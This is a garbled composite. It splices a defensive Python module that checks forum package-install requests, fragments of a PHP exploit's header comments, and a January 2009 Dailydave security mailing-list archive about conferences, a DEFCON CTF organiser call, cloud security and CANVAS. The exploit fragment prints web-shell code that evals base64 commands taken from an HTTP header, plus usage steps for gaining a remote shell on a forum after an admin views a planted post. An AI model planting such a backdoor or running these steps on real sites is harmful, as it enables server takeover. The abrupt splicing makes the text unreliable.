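     <img> tag loaded by the admin's browser cannot trigger it;
  2. a state-changing action is accepted only over POST, never GET;
  3. the package parameter must resolve to a regular file inside
     Packages/, so ../attachments/<predictable_name> is rejected.
"""
import hmac
import os
import secrets
import tempfile
from dataclasses import dataclass, field
from typing import Dict, Optional


class PackageInstallDenied(Exception):
    """Raised when a package-install request fails any of the checks."""


@dataclass
class AdminSession:
    user: str
    # Per-session secret that the admin's own forms send back; a remote
    # image fetch issued by the browser never includes it.
    session_code: str = field(default_factory=lambda: secrets.token_hex(16))


@dataclass
class Request:
    method: str
    params: Dict[str, str]
    session: Optional[AdminSession]  # None when the requester is not logged in


def resolve_package_path(packages_dir: str, name: str) -> str:
    """Return the real path of `name` only if it is a file inside packages_dir."""
    if not name:
        raise PackageInstallDenied("no package given")
    base = os.path.realpath(packages_dir)
    candidate = os.path.realpath(os.path.join(base, name))
    # realpath() collapses ../ and symlinks; an absolute `name` also lands
    # outside base because os.path.join() discards base in that case.
    if os.path.commonpath([base, candidate]) != base or candidate == base:
        raise PackageInstallDenied("package path escapes Packages/")
    if not os.path.isfile(candidate):
        raise PackageInstallDenied("package is not a regular file")
    return candidate


def authorize_package_install(req: Request, packages_dir: str) -> str:
    """Every check the described endpoint skipped; returns the file to install."""
    if req.session is None:
        raise PackageInstallDenied("admin login required")
    if req.method != "POST":
        raise PackageInstallDenied("state change requires POST, not GET")
    supplied = req.params.get("sc", "")
    # constant-time compare so the token cannot be guessed byte by byte
    if not hmac.compare_digest(supplied, req.session.session_code):
        raise PackageInstallDenied("missing or wrong session code")
    return resolve_package_path(packages_dir, req.params.get("package", ""))


def allowed(req: Request, packages_dir: str) -> bool:
    try:
        authorize_package_install(req, packages_dir)
        return True
    except PackageInstallDenied:
        return False


def demo() -> Dict[str, bool]:
    """Replay the request shapes from the attack chain against a constructed
    forum directory tree; returns which of them the checks let through."""
    root = tempfile.mkdtemp()
    packages = os.path.join(root, "Packages")
    attachments = os.path.join(root, "attachments")
    os.makedirs(packages)
    os.makedirs(attachments)
    open(os.path.join(packages, "legit.tgz"), "w").close()
    # constructed attacker upload, named the predictable way the notes describe
    open(os.path.join(attachments, "7_evil_tgz0123abcd"), "w").close()
    admin = AdminSession("admin")
    traversal = "../attachments/7_evil_tgz0123abcd"
    return {
        # the [img] trick: the admin's browser issues a GET with no token
        "img_get": allowed(Request("GET", {"package": traversal}, admin), packages),
        # a POST forged without knowing the session code
        "post_no_code": allowed(Request("POST", {"package": traversal}, admin), packages),
        # a genuine admin form submission, but pointed outside Packages/
        "post_traversal": allowed(
            Request("POST", {"package": traversal, "sc": admin.session_code}, admin),
            packages),
        # the same POST with a package that really lives in Packages/
        "post_legit": allowed(
            Request("POST", {"package": "legit.tgz", "sc": admin.session_code}, admin),
            packages),
        # anonymous visitor, no session at all
        "anonymous": allowed(Request("POST", {"package": "legit.tgz"}, None), packages),
    }


if __name__ == "__main__":
    for name, ok in demo().items():
        print(f"{name:15s} {'ALLOWED' if ok else 'denied'}")
```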
# - Code: if(isset($_SERVER['HTTP_SHELL'])) { print 1234567890;eval(base64_decode($_SERVER['HTTP_SHELL']));print 1234567890;exit(); }
#
# First run the exploit like this:
# eg: php exploit.php -url http://localhost/forum/ -bid 2 -user tester:passwd
# And when you think the admin viewed your post, run the shell :)
# eg: php exploit.php -url http://localhost/forum/ -shell
#
From prabu at hackinthebox.org Tue Jan 20 17:13:16 2009 From: prabu at hackinthebox.org (Praburaajan) Date: Wed, 21 Jan 2009 06:13:16 +0800 Subject: [Dailydave] Videos from HITBSecConf2008 - Malaysia released! Message-ID: <49764C7C.9090501@hackinthebox.org> The videos from HITBSecConf2008 - Malaysia are now available for download!
Day 1
=====
http://thepiratebay.org/torrent/4654588/HITBSecConf2008_-_Malaysia_Videos___Day_1
Keynote Address 1: The Art of Click-Jacking - Jeremiah Grossman
Keynote Address 2: Cyberwar is Bullshit - Marcus Ranum
Presentations:
- Delivering Identity Management 2.0 by Leveraging OPSS
- Bluepilling the Xen Hypervisor
- Pass the Hash Toolkit for Windows
- Internet Explorer 8 - Trustworthy Engineering and Browsing
- Full Process Reconstitution from Memory
- Hacking Internet Kiosks
- Analysis and Visualization of Common Packers
- A Fox in the Hen House - UPnP IGD
- MoocherHunting
- Browser Exploits: A New Model for Browser Security
- Time for a Free Hardware Foundation?
- Mac OS Xploitation
- Hacking a Bird in The Sky 2.0
- How the Leopard Hides His Spots - OS X Anti-Forensics Techniques
Day 2
=====
http://thepiratebay.org/torrent/4654974/HITBSecConf2008_-_Malaysia_Videos___Day_2
Keynote Address 3: Dissolving an Industry as a Hobby - THE PIRATE BAY
Presentations:
- Pushing the Camel Through the Eye of a Needle
- An Effective Methodology to Enable Security Evaluation at RTL Level
- Remote Code Execution Through Intel CPU Bugs
- Next Generation Reverse Shell
- Build Your Own Password Cracker with a Disassembler and VM Magic
- Decompilers and Beyond
- Cracking into Embedded Devices and Beyond!
- Client-side Security
- Top 10 Web 2.0 Attacks
=== On a related note, the registration for HITBSecConf2009 - Dubai (20th - 23rd April) is now open! http://conference.hitb.org/hitbsecconf2009dubai/ The Call for Papers (CFP) for HITBSecConf2009 - Malaysia (October 5th - 8th) will open in March 2009. A belated Happy New Year from all of us at Hack in The Box and may all your exploits result in root shell! :) The HITB Team. From dtangent at defcon.org Tue Jan 20 18:51:31 2009 From: dtangent at defcon.org (The Dark Tangent) Date: Tue, 20 Jan 2009 15:51:31 -0800 Subject: [Dailydave] DEFCON 17 CTF Call for new Organizers! Message-ID: <022501c97b5a$14312d10$3c938730$@org> DEFCON 17 CTF Call for new Organizers! Call for DEFCON Capture the Flag Organizers Version 2.0. Please spread this announcement far and wide! ------------------------------------ WANTED: An evil large multinational corporation, or... A nefarious group of genius autonomous hackers, or... A shadowy government organization from somewhere in the world TO: Host, recreate, and innovate the world's most (in)famous hacking contest. WHY: For everlasting fame, intrusive media interviews, the respect of your peers, or the envy of your enemies. Do you have what it takes and know what we're talking about?
THE STORY THUS FAR: All things must change, and after years of hard work and consistent advances Kenshoto has decided that it is time to let someone else have a chance to run CTF. We will forever miss their crazy videos and clever configurations. After taking it to the next level, creating a spectator sport out of geeks sitting at their keyboards 0wning machines, and helping CTF gain fabulous recognition around the world, Kenshoto has officially retired as the organizer and hosts of DEFCON's CTF. The contest is not over, merely in transition to the next keepers of the flame. This is the opportunity you and your crew, company, or government have been waiting for! You too can pour your heart, countless thousands of hours into planning, producing, and executing the world's most famous contest of hacking skills. All of the contests at DEFCON are run by volunteers, and CTF is no different. My intent is to make a game that's fun for its participants. Kenshoto did a fabulous job of allowing CTF to be a team and spectator sport through scoring visualizations, commentators, game updates. They took it to a new level in one area, and you can take it to another. The heart of hacking has many facets! CTF is made of many parts from the actual teams, the organizers, observers, third party supporters, the press, con attendees wanting in on some action, and those newbies wondering WTF. YOUR CONSTRAINTS: You must design a bad-ass contest. This contest could have a multiplayer / team aspect, but does not have to. Your contest can be based on previous games, but shouldn't be a mere replication of previous games. You can determine the teams/participants before DEFCON through a pre-qualification phase, or at the conference with a first come-first served approach. You can have multiple contests (for example, one contest with individuals, one with teams).
The contest can be totally electronic, or it can take into account social engineering, physical security bypass, even hardware modification. You determine the constraints, size of teams, deciding if remote teams can play - really almost everything is up in the air. You design the network topology. You determine the rules. Your group will determine the winner, and the losers. The idea behind this CFP is not to ask people to reproduce past Capture the Flags, but to have your group reinvent and create something new, based on the same creativity and energy that CTF is known for. Challenge your friends! YOU MUST: Clearly communicate the rules to the participants before the contest, set up clear eligibility requirements (if any) before the conference, set up the network, provide any infrastructure that you wish to be part of the game, referee the game while it is taking place, create a scoring system that observers can view to get an idea of what is going on, and determine winners. The easier it is for contestants to understand how to win, the more fair the contest will feel. The contest must end no later than two hours before the end of DEFCON (5pm Sunday) in order to provide time for final scoring and the awards ceremony. YOU MUST NOT: Interfere with the DEFCON networks (i.e.: it must be a separate network), interfere with the 'live internet', involve non-consensual parties (i.e.: anyone who hasn't explicitly agreed to take part in the contests), take bribes that are not equally shared with the DEFCON staff. You must be totally neutral and fair. In the past network traffic on CTF has been captured for later forensic analysis and shared with the community to further IDS and network sniffer developers. Expect that should we want to do this again there is a way to give access to those wanting to capture traffic while not actively participating in the contest. SUGGESTIONS: Allowing 'lone gunmen' to participate (not require group play).
This could be a separate contest, or they could participate in competition with teams (handicaps for teams, perhaps). Allowing 'outside players', perhaps a VPN connection with one representative at DEFCON, the rest of a shadowy team located elsewhere in the globe. Incorporating non intrusion/defense techniques to the game - steganography, covert communication channels, riddles/puzzles, social engineering, hardware hacking, radio direction finding, etc. A 'theme' (like forensics, covert channels, attacking, defending, application security, host security, etc.) that would be announced beforehand with the contest focused around the theme. YOU WILL BE JUDGED: On any innovations or revolutionary enhancements to the game. On the feasibility of your team getting all the work done (note: we will publicly humiliate you if you get accepted and fail to perform!). On the amount of fun (as measured in FunMeters) that participants will have. Once you submit your ideas (Yes you can submit more than one concept) we will start communicating with you to clarify anything we don't understand. Feel free to ask us questions so you know what you are getting yourself into. A group that works well together is almost a must. Ghetto Hackers and Kenshoto did very well because they had a large enough pool of talent to draw upon when building their automated systems. RESOURCES WE CAN PROVIDE: Badges to the conference and access to the CTF area for setup on Thursday, the day before the con. Physical space roughly equal to that which has been provided at past DEFCONs. Tables for participants to use. Screens and LCD projectors to display data with. Network connections from the net if necessary. Some network gear and power strips - please let us know early what you need so we can plan for it. Prizes for the winning people or teams. If you want to turn the CTF area into a giant free-for-all we can get the power strips and tables.
If you want it to be like years past with eight team tables we can do that too. Want to drop some clues in the printed con program? Want to incorporate some clues or components into the attendee badges? We can do that too! Winning teams get a maximum of eight Black Badges. RESEARCH POINTERS: If you haven't been to DEFCON before, you should understand the environment your contest must operate in! https://www.defcon.org/ will get you started. These may help give you an idea about past contests, what has worked, and what hasn't. Ceazar gave a presentation on running hacking contests at Black Hat Asia (learn from a master): https://www.blackhat.com/presentatio...p-04-eller.pdf A rundown of DEFCON 16 CTF by atlas of team l at stplace (DEFCON 14 and 15 CTF Winners): http://atlas.r4780y.com/cgi-bin/atla...080808-sk3wl3d Walkthroughs of the last 3 CTF Competitions: http://nopsr.us Interview with Def Con CTF Winning Team Member Vika Felmetsger (2005): http://taosecurity.blogspot.com/2005...f-winning.html An article on the 2004 CTF on Network World: http://www.networkworld.com/news/2004/080904defcon.html Ceazar's How to Win the DEFCON CTF: https://www.defcon.org/html/defcon-1...echtv-ctf.html So you want to play a game? HERE IS THE PROCESS: 1. Fill out the application below. You will receive an acknowledgment that your submission was received within 48 business hours of us receiving it unless we are snowed in and the interwebs are broke. 2. We will use relatively simple criteria to judge your entry. 1:) Feasibility of your team pulling it off taking into consideration who is involved in your team, resources you have, etc. 2:) The amount of fun we imagine the participants will have with your contest, 3:) the coolness or innovation you bring to the contests. 3. We will contact finalists and ask them further questions, and talk over any questions that we will inevitably have. 4. We will announce the winner(s) as soon as we can after the close of the CTF CFP date.
It could be possible that we will choose multiple teams that run concurrent but different types of contests. 5. We will hammer out details over the phone, participating in your game creation (not interfering with it, just ensuring everything is going smoothly). We will conference call with you and may fly you out to sunny Seattle to meet with us to discuss planning for the event. 6. Kenshoto has volunteered to spend time working with the selected team, answering their questions, explaining their process and what they learned in designing their game. They have a lot of experience and skill so this is a resource you will want to take advantage of.
APPLICATION: All contact information will be kept private, and not disclosed outside the DEFCON planning organization.
About you and your group
Name of your organization:
Name of primary contact:
Email Address of Primary contact:
Phone number of primary contact:
Number of people in your organization (that will actively be participating in creating/planning/executing CTF):
Experience team members have had in planning events (This could be a bake sale with 500 people, or a DoD briefing for 20 people, something that indicates some planning experience):
Technical ability of team. This would include a general list of people's abilities * networking, hardware, etc and support the idea you can pull this off:
Physical resources (if any) that you will be bringing to help run CTF such as a disco ball, robots or enigma machines. This is to help us plan to accommodate it with the hotel if you require extra power or special fire marshal approval for your Cray 1 cooling towers.:
What experience have your team members had in playing CTF in the past. This is not a requirement, but shows real-world knowledge of the game as it has been played in the past.:
Explain your vision for CTF
- Explain, in a general manner, your vision of your CTF.
- Explain how you hope the attendees will experience it. For example, they sign up on-line, get a secret package in the mail, start blindfolded with an unusual laptop? Are there certain crisis points you will introduce during the game to confuse or add to the pressure?
- Provide three reasons your group should host CTF.
- How do players or teams qualify (if there are qualifications)?
- Is it multi player or single-player, or a combination?
- What innovations or new ideas are you bringing to CTF?
- How long will the contest take, will it be 24x7, 8 hour shifts, etc?
- What technical work is required to execute your plan. This includes setting up environments beforehand, pre-qualification work if any, writing a scoring system, etc.?
- Give an outline of the rules that will be presented to the participants:
- Why do you want to do this?
- What hardware resources do you request or need from DEFCON?
- Explain what you believe is the best way to gauge a hacker's abilities, and how your vision of the contest could do this?
- Tell us anything else that you think may be important or that we might consider in choosing your group to host CTF.
Send 'em in! If you are submitting multiple ideas please make each one a separate email so when printed and forwarded between judges there is less confusion. Deadline is February 28th, 2009. Submissions go to ctf [at] defcon [d0t] org A discussion area has been created on the DEFCON forums under the DEFCON 17 Events section to cover new ideas, ask for feedback, and get an idea of what is going on. https://forum.defcon.org/forumdisplay.php?f=458 New announcements will be on the main DEFCON web site as well: https://www.defcon.org/ Feel free to join the discussion, ask people for feedback on your ideas, ask questions.. use all the resources at your disposal! Thank you!
The Dark Tangent From dave at immunityinc.com Wed Jan 21 23:06:40 2009 From: dave at immunityinc.com (Dave Aitel) Date: Wed, 21 Jan 2009 23:06:40 -0500 Subject: [Dailydave] The magic in the cloud Message-ID: <4977F0D0.9060305@immunityinc.com> Lately, while I get up to speed on Django and whatever Zen it is that makes Twitter a huge hit and FriendFeed something you only visit once, I've been obsessing about a comment someone made to me at a party. They said "What we want is grid computing, like with our mainframes, but we want to outsource the whole cloud." Which is funny, because Terremark, another major Miami technology company, recently opened up its "outsource your cloud" service. Of course, lots of companies let you buy VPS's, but usually these are companies that are cannibalizing sales of shared hosting machines for PHP apps, not backend processing for real companies. But if you can outsource, say, your trading algorithms onto someone else's CPU, then why not just outsource all your sensitive data? Why not make this someone else's problem, assuming you can get a contract or insurance to cover you financially? By the time it all bursts like the real estate bubble, some other CTO will be left holding the smoke anyways. "Cloud computing" has a magic ring to it. It makes it someone else's problem, but somehow hides the security issues.
No CTO in his right mind would ever consider shared hosting as protected by Unix Permissions. Even Solaris Containers and Zones and newfangled isolation hotness never seems to pass muster. If an attacker can buy space on the same kernel, it's not allowed. No amount of crypto magic, kerberos, key distribution, or PKI can bless it. So why on earth is it ok if the attacker can buy space on the same hypervisor? By what trick of psychology is that different? Speaking of different, I wanted to point out that Immunity has partnered up with CanSecWest and we're offering free admission to this year's 2009 conference in March. You're probably already going, but if you wanted to go for free, which I guarantee makes it easier to find budget for, you should email admin at immunityinc.com and find out how. -dave From rafal at ishackingyou.com Thu Jan 22 01:41:28 2009 From: rafal at ishackingyou.com (Rafal @ IsHackingYou.com) Date: Thu, 22 Jan 2009 00:41:28 -0600 Subject: [Dailydave] The magic in the cloud In-Reply-To: <4977F0D0.9060305@immunityinc.com> References: <4977F0D0.9060305@immunityinc.com> Message-ID: So... how is the hype and magic around "Cloud Computing" and "Cloud Security" any different (aside from the context, obviously) than the wave of business process outsourcing we did to the cloud (sorry, we call it off-shore'ing)? Your key points if I understand them are outsourcing of critical company information, shared environments as related to attacks, and liability write-off to a 3rd party... if you strip away the buzz-phrase "cloud computing" you can replace it with "process off-shore'ing" or any other thing we've stupidly done over the last 5 years in the name of "cost savings" or some such stupidity... Anyway...
same pig, different lipstick if you ask me. __ Rafal M. Los Security & IT Risk Strategist - Blog: http://preachsecurity.blogspot.com - LinkedIn: http://www.linkedin.com/in/rmlos -------------------------------------------------- From: "Dave Aitel" Sent: Wednesday, January 21, 2009 10:06 PM To: Subject: [Dailydave] The magic in the cloud -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Lately, while I get up to speed on Django and whatever Zen it is that makes Twitter a huge hit and FriendFeed something you only visit once, I've been obsessing about a comment someone made to me at a party. They said "What we want is grid computing, like with our mainframes, but we want to outsource the whole cloud." Which is funny, because Terremark, another major Miami technology company, recently opened up its "outsource your cloud" service. Of course, lots of companies let you buy VPS's, but usually these are companies that are cannibalizing sales of shared hosting machines for PHP apps, not backend processing for real companies. But if you can outsource, say, your trading algorithms onto someone else's CPU, then why not just outsource all your sensitive data? Why not make this someone else's problem, assuming you can get a contract or insurance to cover you financially? By the time it all bursts like the real estate bubble, some other CTO will be left holding the smoke anyways. "Cloud computing" has a magic ring to it. It makes it someone else's problem, but somehow hides the security issues. No CTO in his right mind would ever consider shared hosting as protected by Unix Permissions. Even Solaris Containers and Zones and newfangled isolation hotness never seems to pass muster. If an attacker can buy space on the same kernel, it's not allowed. No amount of crypto magic, kerberos, key distribution, or PKI can bless it. So why on earth is it ok if the attacker can buy space on the same hypervisor? By what trick of psychology is that different? 
Speaking of different, I wanted to point out that Immunity has partnered up with CanSecWest and we're offering free admission to this year's 2009 conference in March. You're probably already going, but if you wanted to go for free, which I guarantee makes it easier to find budget for, you should email admin at immunityinc.com and find out how. - -dave -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFJd/DQtehAhL0gheoRAs40AJ4w4OVqvLDr/9BXL7SeXoobQa3BggCeL8aq iVDsyxyhA08hZNhVLWi2zQQ= =RvxL -----END PGP SIGNATURE----- _______________________________________________ Dailydave mailing list Dailydave at lists.immunitysec.com http://lists.immunitysec.com/mailman/listinfo/dailydave From crioux at noctem.org Thu Jan 22 09:52:19 2009 From: crioux at noctem.org (Christien Rioux) Date: Thu, 22 Jan 2009 09:52:19 -0500 Subject: [Dailydave] The magic in the cloud In-Reply-To: References: <4977F0D0.9060305@immunityinc.com> Message-ID: <5680af290901220652i5794d303q292f0435afbbeb4@mail.gmail.com> At least for Google, I predict that NaCl (Google Native Client) will not just be used to secure the Chrome browser plugins (as publically stated) , but also to secure native applications running on Android (which is currently of huge interest to Google), and to secure cloud applications (which I hope they've thought of!) running natively on the infrastructure. Why not just sandbox everything to raise the bar for the attacker significantly? --chris On Thu, Jan 22, 2009 at 1:41 AM, Rafal @ IsHackingYou.com wrote: > So... how is the hype and magic around "Cloud Computing" and "Cloud > Security" any different (aside from the context, obviously) than the wave of > business process outsourcing we did to the cloud (sorry, we call it > off-shore'ing)? 
> Your key points if I understand them are outsourcing of
> critical company information, shared environments as related to attacks, and
> liability write-off to a 3rd party... if you strip away the buzz-phrase
> "cloud computing" you can replace it with "process off-shore'ing" or any
> other thing we've stupidly done over the last 5 years in the name of "cost
> savings" or some such stupidity...
>
> Anyway... same pig, different lipstick if you ask me.
>
> __
> Rafal M. Los
> Security & IT Risk Strategist
>
> - Blog: http://preachsecurity.blogspot.com
> - LinkedIn: http://www.linkedin.com/in/rmlos
>
> --------------------------------------------------
> From: "Dave Aitel"
> Sent: Wednesday, January 21, 2009 10:06 PM
> To:
> Subject: [Dailydave] The magic in the cloud
>
> Lately, while I get up to speed on Django and whatever Zen it is that
> makes Twitter a huge hit and FriendFeed something you only visit once,
> I've been obsessing about a comment someone made to me at a party.
> They said "What we want is grid computing, like with our mainframes,
> but we want to outsource the whole cloud."
>
> Which is funny, because Terremark, another major Miami technology
> company, recently opened up its "outsource your cloud" service. Of
> course, lots of companies let you buy VPS's, but usually these are
> companies that are cannibalizing sales of shared hosting machines for
> PHP apps, not backend processing for real companies.
>
> But if you can outsource, say, your trading algorithms onto someone
> else's CPU, then why not just outsource all your sensitive data? Why
> not make this someone else's problem, assuming you can get a contract
> or insurance to cover you financially? By the time it all bursts like
> the real estate bubble, some other CTO will be left holding the smoke
> anyways.
>
> "Cloud computing" has a magic ring to it. It makes it someone else's
> problem, but somehow hides the security issues.
> No CTO in his right
> mind would ever consider shared hosting as protected by Unix
> Permissions. Even Solaris Containers and Zones and newfangled
> isolation hotness never seems to pass muster. If an attacker can buy
> space on the same kernel, it's not allowed. No amount of crypto magic,
> kerberos, key distribution, or PKI can bless it.
>
> So why on earth is it ok if the attacker can buy space on the same
> hypervisor? By what trick of psychology is that different?
>
> Speaking of different, I wanted to point out that Immunity has
> partnered up with CanSecWest and we're offering free admission to this
> year's 2009 conference in March. You're probably already going, but if
> you wanted to go for free, which I guarantee makes it easier to find
> budget for, you should email admin at immunityinc.com and find out how.
>
> -dave

From dave at immunityinc.com Fri Jan 23 15:16:05 2009
From: dave at immunityinc.com (Dave Aitel)
Date: Fri, 23 Jan 2009 15:16:05 -0500
Subject: [Dailydave] The most important ability is being able to hide your abilities.
Message-ID: <497A2585.1060409@immunityinc.com>

So much of what we do is writing things that are not rootkits, but essentially use similar techniques:

14:58 < justin> so its like 0x4ad01214 is the IAT entry for CreateProcessW
14:58 < justin> this allows me to do C:>notepad.exe and test my hook
14:58 < justin> and imm.inject_dll("C:\\UpprivHook.dll")
14:58 < justin> to test
14:59 < dave> cool
14:59 < dave> imm.inject_dll == totally awesome

Right now Immunity is building something that requires a userland hook and a kernel-mode hook. Honestly, I think the world needs another book on Windows Rootkits!

Oh, and congrats to Mike Reavy and Andrew Cushman!
http://www.cio.com/article/477472/Microsoft_Security_Response_Center_Gets_New_Boss

-dave

From dave at immunityinc.com Tue Jan 27 09:24:01 2009
From: dave at immunityinc.com (Dave Aitel)
Date: Tue, 27 Jan 2009 09:24:01 -0500
Subject: [Dailydave] Hello Microsofties!
Message-ID: <497F1901.2090405@immunityinc.com>

So as a side project I'm doing something weirder than usual: C#. Well, it doesn't have to be C#. Ideally it'd be IronPython - but it's CLR, which means the underlying language is essentially C# no matter what your syntax looks like.

Here's where we're coming from over at Immunity. It's great to have a penetration testing tool. Everyone loves a nice GUI popping up shells. But, in fact, for some large percentage of our customers you're really only using that tool in order to fit it into your internal business processes, which Immunity typically knows nothing about.
While we have a number of people writing exploits using the CANVAS Python API, it's not necessarily the way everyone wants to extend CANVAS. For example, for unknown reasons, not everyone knows Python!

So instead we have an XML-RPC API. Ideally every network attack tool would have the same XML-RPC API so you could talk to them all with the same client code, but that might be asking a lot in the short run.

In the meantime, you have a ton of people using Visio with their network diagrams, and I want to give them a way to connect to CANVAS's running on those subnets and do cool things. Imagine if you could just right-click a Visio picture and say "What OS is this really?" or "Is this machine patched for MS08_067?" or "Color all the MS machines on this network red, and the Linux ones blue" or "Tell me which machines are on this network" or "Portscan these and tell me which ones are IIS". Really, the possibilities are endless when it comes to business logic automation.

Essentially, a web application these days is just one instance of something consuming your XML-RPC API. Everyone else can build their own web mashups, or even thick clients based on their own business tools. Welcome to Web 2.0! :>

Anyway, my question is: Who has done something like this with Visio? What do you recommend - and where is the IRC channel for quick help with the Visio API? :>

-dave

From dave at immunityinc.com Tue Jan 27 18:13:56 2009
From: dave at immunityinc.com (Dave Aitel)
Date: Tue, 27 Jan 2009 18:13:56 -0500
Subject: [Dailydave] For those: a collection
Message-ID: <497F9534.7090607@immunityinc.com>

For those who like XKCD:
http://icantdrawfeet.com/2008/10/23/onandonandon/

For those who like to eat at my fav Iraqi restaurant in Laurel (hey, I remember that guy!):
http://www.cicentre.com/spycase/DELLEMY_Saubhe_Jassim_al.html

For those who read Japanese and use CANVAS (partial translation - I'm working on it!):
http://www.immunityinc.com/downloads/jp1.png

For those who speak English or Japanese and want to write Vista Heap Overflows:

WHAT: Understanding and Exploiting Windows Vista Heap Overflows
WHEN: February 17-20, 2009
WHERE: Tokyo, Japan
COST: $5,618USD (tax included)
HOW: admin at immunityinc.com

-dave

From mhtajik at gmail.com Tue Jan 27 09:54:09 2009
From: mhtajik at gmail.com (Mohammad Hosein)
Date: Tue, 27 Jan 2009 18:24:09 +0330
Subject: [Dailydave] Hello Microsofties!
In-Reply-To: <497F1901.2090405@immunityinc.com>
References: <497F1901.2090405@immunityinc.com>
Message-ID: <26f61db50901270654q18205eaemeafd04c288c97337@mail.gmail.com>

As much as it may look embarrassing since this is a hacker forum, once I did a fairly complex Office Add-in development using tools that come from "Add-in Express" and it saved me a lot of time, and, well, money.
But basically what you need is to instantiate a dozen of Office's whacky COM classes and call a bunch of methods. It's unreasonably undocumented and hard to debug. Instead, this package gave me a couple of components and wizards that helped me ignore the complexity and just go on with my business.

http://www.add-in-express.com

On Tue, Jan 27, 2009 at 5:54 PM, Dave Aitel wrote:
> So as a side project I'm doing something weirder than usual: C#. Well,
> it doesn't have to be C#. Ideally it'd be IronPython - but it's CLR
> which means the underlying language is essentially C# no matter what
> your syntax looks like.
>
> Here's where we're coming from over at Immunity. It's great to have a
> penetration testing tool. Everyone loves a nice GUI popping up shells.
> But, in fact, for some large percentage of our customers you're really
> only using that tool in order to fit it into your internal business
> processes which Immunity typically knows nothing about. While we have
> a number of people writing exploits using the CANVAS Python API, it's
> not necessarily the way everyone wants to extend CANVAS. For example,
> for unknown reasons, not everyone knows Python!
>
> So instead we have an XML-RPC API. Ideally every network attack tool
> would have the same XML-RPC API so you could talk to them all with the
> same client code, but that might be asking a lot in the short run.
>
> In the meantime, you have a ton of people using Visio with their
> network diagrams, and I want to give them a way to connect to CANVAS's
> running on those subnets and do cool things. Imagine if you could just
> right click a Visio picture and say "What OS is this really?" or "Is
> this machine patched for MS08_067?" or "Color all the MS machines on
> this network red, and the Linux ones Blue" or "Tell me which machines
> are on this network" or "Portscan these and tell me which ones are
> IIS".
> Really, the possibilities are endless when it comes to business
> logic automation.
>
> Essentially, a web application these days is just one instance of
> something consuming your XML-RPC API. Everyone else can build their
> own web mashups, or even thick clients based on their own business
> tools. Welcome to Web 2.0! :>
>
> Anyways, my question is: Who has done something like this with Visio?
> What do you recommend - and where is the IRC channel for quick help
> with the Visio API? :>
>
> -dave

From dr at kyx.net Tue Jan 27 20:18:32 2009
From: dr at kyx.net (Dragos Ruiu)
Date: Tue, 27 Jan 2009 17:18:32 -0800
Subject: [Dailydave] For those: a collection
In-Reply-To: <497F9534.7090607@immunityinc.com>
References: <497F9534.7090607@immunityinc.com>
Message-ID: <7F910286-B16E-43C3-AC5A-2543B4EC55EE@kyx.net>

Re: your trip to Japan. Here is a nifty bit to pack if any of your group has an iPhone. A speech-recognition Japanese/English language translator software from NEC:
http://www.akihabaranews.com/en/news_details.php?id=17263

Also... if you are staying in/near Shinjuku, there is some Alice-meets-gothic-lolita Alice in Wonderland themed restaurant I've been meaning to check out (despite it being in Kabukicho):
http://metropolis.co.jp/tokyo/769/restaurants.asp

If you go, do send me reviews :).

cheers,
--dr

--
World Security Pros.
Cutting Edge Training, Tools, and Techniques
Vancouver, Canada March 16-20 2009 http://cansecwest.com
London, U.K. May 27/28 2009 http://eusecwest.com
pgpkey http://dragos.com/ kyxpgp

From dummychuck at gmail.com Tue Jan 27 20:07:12 2009
From: dummychuck at gmail.com (Tucker Dummychuck)
Date: Tue, 27 Jan 2009 17:07:12 -0800
Subject: [Dailydave] Hello Microsofties!
In-Reply-To: <26f61db50901270654q18205eaemeafd04c288c97337@mail.gmail.com>
References: <497F1901.2090405@immunityinc.com> <26f61db50901270654q18205eaemeafd04c288c97337@mail.gmail.com>
Message-ID: <94cf67610901271707y66dd1b57yb1a73165080917c0@mail.gmail.com>

I've not done this myself, but I think a good starting point would be VSTO (Visual Studio Tools for Office). See http://blogs.msdn.com/chhopkin/archive/2008/08/29/vsto-3-0-and-visio-essentials.aspx

thx
Tucker.

On Tue, Jan 27, 2009 at 6:54 AM, Mohammad Hosein wrote:
> as much as it may look embarrassing since this is a hacker forum , once i
> did a fairly complex Office Add-in development using tools come from "Add-in
> Express" and it saves me a lot of time , and well , money .
> but basically what you need is to instantiate a dozen of Office's whacky COM
> classes and call a bunch of methods . its unreasonably undocumented and hard
> to debug . instead , this package gave me a couple of components and Wizards
> helped me ignore the complexity and just go on with my business .
>
> http://www.add-in-express.com
>
>
> On Tue, Jan 27, 2009 at 5:54 PM, Dave Aitel wrote:
>
>> So as a side project I'm doing something weirder than usual: C#. Well,
>> it doesn't have to be C#. Ideally it'd be IronPython - but it's CLR
>> which means the underlying language is essentially C# no matter what
>> your syntax looks like.
>>
>> Here's where we're coming from over at Immunity. It's great to have a
>> penetration testing tool. Everyone loves a nice GUI popping up shells.
>> But, in fact, for some large percentage of our customers you're really
>> only using that tool in order to fit it into your internal business
>> processes which Immunity typically knows nothing about. While we have
>> a number of people writing exploits using the CANVAS Python API, it's
>> not necessarily the way everyone wants to extend CANVAS. For example,
>> for unknown reasons, not everyone knows Python!
>>
>> So instead we have an XML-RPC API. Ideally every network attack tool
>> would have the same XML-RPC API so you could talk to them all with the
>> same client code, but that might be asking a lot in the short run.
>>
>> In the meantime, you have a ton of people using Visio with their
>> network diagrams, and I want to give them a way to connect to CANVAS's
>> running on those subnets and do cool things. Imagine if you could just
>> right click a Visio picture and say "What OS is this really?" or "Is
>> this machine patched for MS08_067?" or "Color all the MS machines on
>> this network red, and the Linux ones Blue" or "Tell me which machines
>> are on this network" or "Portscan these and tell me which ones are
>> IIS". Really, the possibilities are endless when it comes to business
>> logic automation.
>>
>> Essentially, a web application these days is just one instance of
>> something consuming your XML-RPC API. Everyone else can build their
>> own web mashups, or even thick clients based on their own business
>> tools. Welcome to Web 2.0! :>
>>
>> Anyways, my question is: Who has done something like this with Visio?
>> What do you recommend - and where is the IRC channel for quick help
>> with the Visio API? :>
>>
>> -dave

From ceng at Veracode.com Wed Jan 28 01:50:42 2009
From: ceng at Veracode.com (Chris Eng)
Date: Wed, 28 Jan 2009 01:50:42 -0500
Subject: [Dailydave] For those: a collection
In-Reply-To: <497F9534.7090607@immunityinc.com>
References: <497F9534.7090607@immunityinc.com>
Message-ID: <79348E23E9D34F4F8032010B2913D72B021947B9@NexusCore.Veracode.local>

> For those who like to eat at my fav Iraqi restaurant in Laurel (hey, I
> remember that guy!):
> http://www.cicentre.com/spycase/DELLEMY_Saubhe_Jassim_al.html

